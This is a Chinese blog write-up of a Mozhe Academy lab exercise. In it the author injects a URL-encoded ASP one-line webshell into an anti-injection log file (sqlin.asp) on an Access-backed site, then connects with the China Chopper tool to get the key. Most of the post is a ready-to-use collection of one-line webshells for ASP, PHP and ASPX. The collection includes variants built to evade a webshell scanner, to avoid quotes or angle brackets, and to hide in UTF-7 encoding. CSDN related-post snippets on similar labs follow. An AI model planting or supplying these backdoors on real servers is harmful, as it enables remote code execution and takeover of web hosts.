SQL注入实战(防注入)-Access<墨者学院漏洞操作记录>

最新推荐文章于 2023-01-24 18:14:00 发布
最新推荐文章于 2023-01-24 18:14:00 发布
阅读量326 收藏
点赞数
分类专栏: 漏洞/靶场操作记录 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chick11/article/details/118799362
版权

1、 打开靶场

拿御剑扫秒后台


 

百度得知所有记录会保存在sqlin.asp的目录

2、 插入一句话木马 <%eval request(“user”)%>

http://219.153.49.228:47828/news.asp?id=1%20

and%201=%3C%eval%20request(%22user%22)%%3E



3、 对木马进行URLencode

使用菜刀连接并找到key;

常用的一句话木马

常用一句话木马

asp一句话木马:
   <%execute(request("value"))%>
  php一句话木马:
   <?php @eval($_POST[value]);?>
  aspx一句话木马:
  <%@ Page Language="Jscript"%>
  <%eval(Request.Item["value"])%>

其他一句话木马:

<%eval request("value")%>
  <%execute request("value")%>
  <%execute(request("value"))%>
  <%If Request("value")<>"" Then Execute(Request("value"))%>
  <%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%>
  <SCRIPT language=VBScript runat="server">execute request("value")</SCRIPT>
  <%@ Page Language="Jscript"%>
  <%eval(Request.Item["value"],"unsafe");%>
  可以躲过雷客图的一句话木马:
  <%
  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
  ms.Language="VBScript"
  ms.AddObject "Response", Response
  ms.AddObject "request", request
  ms.ExecuteStatement("ev"&"al(request(""value""))")
  %>
  不用'<,>'的asp一句话木马:
  <script language=VBScript runat=server>execute request("value")</script>
  不用双引号的一句话木马:
  <%eval request(chr(35))%>

UTF-7编码加密:

<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

chick&
关注
专栏目录
墨者学院--SQL手工注入漏洞测试(Access数据库)
YYYYYcici的博客
05-18 908
墨者学院–SQL手工注入漏洞测试(Access数据库) 靶场连接: 解题思路: 判断是否存在sql注入 利用order by判断字段数量 联合注入猜测表名 联合注入猜测列名 登陆,拿KEY 打开题目,页面如下所示 一、 点击蓝色划线区域,跳转下一正常页面(跳转页面出现id=1) 二、判断存在注入(/ 、-0 、 and 1=1) 三、判断字段数量(order by...
微软数据库的SQL注入漏洞解析——Microsoft Access、SQLServer与SQL注入
最新发布
CoffeMilk的博客
09-12 2109
一般进行SQL注入前,都需要对这些数据库所对应的程序寻找注入点,常见的SQL注入点一般存在于参数输入、输出的位置(如:注册登录、不同页码、参数内容的数据查询、不同页面切换、留言版等内容)。
SQL注入实战(注入)-Access
qq_36896220的博客
09-15 383
这道题目算是给了SQL注入另外的思路了。一般而言我们测试SQL注入会选择那些有直接显示的地方(比如id=1,name=xxx),但这会局限你的思维,所以一定要多多培养做题的思路才能应对各种情况。下面会给出不一样的思路: 1.这是墨者学院一道有waf的sql注入,有很多人遇到有waf的环境就感觉头大,确实绕waf很头疼,但waf也有强弱之分,我们要做的就是测试一下对方服务器的waf做了什么,...
0x35.SQL注入实战(注入)-Access
qq_31679787的博客
12-10 196
查找资料得知,sql通用注入系统写入的日志文件为sqlin.asp,所以构造一句话木马写入文件中; 发现无法写入后通过URL编码进行绕过; 使用菜刀连接并找到key; ...
墨者 - SQL注入实战(注入)-Access
吃肉唐僧的博客
07-11 1037
网上百度得知,access通用注入系统会把所有记录存到sqlin.asp中 根据题目提示一句话木马,那么这个题其实属于文件上传漏洞,不是SQL注入的范畴了 asp一句话木马 <%eval request("a")%> 直接上传,发现会被过滤掉 用url编码一下:1+and+%3c%25eval+request(%22a%22)%25%3e,成功绕过 直...
墨者学院SQL注入实战--MySQL
Chris_HackFromCN的博客
08-10 915
目录手工注入工具注入(中转型)欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 手工注入 辅助工具:小葵多功能转换工具 作用:编码解码、加密解密 1.首先,启动靶场环境,根据URL显示,可知目标
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6412
墨者学院-X-Forwarded-For注入漏洞实战
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4393
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者学院-SQL注入漏洞测试(报错盲注)
weixin_42939822的博客
03-30 5224
墨者学院-SQL注入漏洞测试(报错盲注)
墨者学院-SQL手工注入漏洞测试(Access数据库)
JimWu的博客
09-04 714
SQL手工注入漏洞测试(Access数据库) 难易程度:★ 题目类型:SQL注入 使用工具:FireFox浏览器 1.打开靶场,寻找注入点。 确定了公告页面可以注入。 2.输入id=1 and 1=1,返回正常页面。 输入id=1 and 1=2,则返回空白页。 3.猜测数据库的表名,输入id=1 and exists(select * from admin),返回正常页面,证明猜对了。 4...
墨者学院;sql手工注入access;在线靶场
xiaochenhang的博客
08-20 781
恭喜你 moke 成功登录用户管理后台,KEY: mozhee7cc35d6a83a8978b4a44f56f6d。6、枚举关键表名:正常则存在admin表;通常access数据库都有admin表;8、 枚举字段:正常则页面不报错;通常access表会存在以下三个字段;,因此看到位数以及字母组成形式的字符可以迅速判断可能是MD5编码。5、access数据库没有库名,都是表名;4、输入' 成功闭合报错,有注入漏洞;1、注册账号,启动环境;9、爆一下用户账户和密码;2、 得到端口号和地址;这里枚举失败,翻车;
墨者学院-access数据库
Qianzshuo的博客
05-03 739
墨者学院 SQL手工注入漏洞测试(Access数据库) 寻找注入点 猜字段数 猜表名 猜列名 查看回显位置 md5解密 登录得到key
墨者学院 SQL手工注入漏洞测试(Access数据库)
痴人说梦梦中人
11-13 347
1、 判断注入点,求主查询列数,order by 4不报错,by3报错。 2、 猜解数据库,登陆获取key 3、 修复建议 对sql语句进行以下处理: ①、 sql语句预编译 ②、 检查变量数据类型和格式 ③、 过滤特殊字符 ④、 转译特殊符号 ...
墨者学院】SQL手工注入漏洞测试(Access数据库)
weixin_43884770的博客
12-04 1181
背景介绍 安全工程师&amp;quot;墨者&amp;quot;最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境IIS+ASP+Access,Aspx代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解Access的数据结构; 4.了解字符串的MD5加解密; 解题方向 手工进行SQL注入测试,获取管理密码登录。 1、判断注入点: 分别用and...
墨者 - SQL手工注入漏洞测试(Access数据库)
吃肉唐僧的博客
07-05 728
order by 1 ,有回显,存在注入点 new_list.asp?id=1 and exists(select * from admin)测试是否存在admin,纯靠猜...... 存在admin表,接下来测回显位置 /new_list.asp?id=1 union select 1,2,3,4 from admin 接下来猜字段值,and exists ...
SQL注入的几种方法 1
weixin_34041003的博客
11-08 124
主题:SQL注入的几种方法近来,网络上的SQLInjection漏洞利用攻击,JS脚本,HTML脚本攻击似乎逾演逾烈.陆续的很多站点都被此类攻击所困扰,并非像主机漏洞那样可以当即修复,来自于WEB的攻击方式使我们在范或者是修复上都带来了很大的不便。HOOO……一个站长最大的痛苦莫过于此.自己的密码如何如何强壮却始终被攻击者得到,但如何才能做...
墨者学院02 SQL手工注入漏洞测试(Access数据库)
weixin_42789937的博客
01-24 327
墨者学院02 SQL手工注入漏洞测试(Access数据库),是一个较为详细的WP~
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,攻击者可能会尝试利用X-F字段进行SQL注入攻击。为了SQL注入攻击,开发人员应该合理地验证和过滤用户输入,并使用参数化查询或预编译语句来SQL注入攻击。此外,最好避免将用户输入直接拼接到SQL查询中。墨者学院可能提供相关的课程或教程来帮助开发人员学习和理解如何SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

chick&

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值